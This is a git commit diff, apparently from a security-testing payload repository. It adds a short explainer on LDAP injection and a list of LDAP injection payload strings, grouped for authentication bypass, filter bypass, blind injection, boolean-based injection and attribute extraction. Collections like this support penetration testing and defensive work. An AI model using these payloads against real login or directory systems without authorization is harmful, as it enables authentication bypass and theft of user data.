Restructure repository: Remove OWASP categorization, organize by vulnerability type

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-05-26 11:35:51 +00:00 · 2026-01-04 19:01:04 +00:00
parent 274734e91a
commit ba72efbc5e
46 changed files with 341 additions and 323 deletions
@@ -0,0 +1,16 @@
+# LDAP Injection
+
+## Description
+LDAP Injection is an attack used to exploit web applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to SQL injection.
+
+## Common Attack Vectors
+- Login forms
+- Search fields
+- User directory lookups
+- Authentication systems
+
+## Testing Approach
+Submit LDAP metacharacters and operators in input fields to test if the application is vulnerable to LDAP injection.
+
+## Payloads
+See `ldap-injection-payloads.txt` for a comprehensive list of LDAP injection payloads.
@@ -0,0 +1,39 @@
+# LDAP Injection Payloads
+
+# Basic LDAP injection
+*
+*(uid=*)
+*(cn=*)
+*(objectClass=*)
+
+# Authentication bypass
+*)(uid=*))(|(uid=*
+*)(|(uid=*))
+*)(cn=admin)(|(cn=*
+admin)(&(uid=*))
+
+# Filter bypass
+*)(objectClass=*))(&(objectClass=*
+*)(|(password=*))
+*)(cn=*)(|(cn=*
+
+# Blind LDAP injection
+*)(cn=a*
+*)(cn=ad*
+*)(cn=adm*
+*)(cn=admin*
+
+# Boolean-based
+(&(uid=admin)(password=*))
+(&(uid=admin)(!(password=wrong)))
+(|(uid=admin)(uid=administrator))
+
+# Wildcard usage
+uid=*
+cn=*
+sn=*
+mail=*
+
+# Attribute extraction
+*)(objectClass=*))(%26(objectClass=*
+*)(uid=*))(%26(uid=*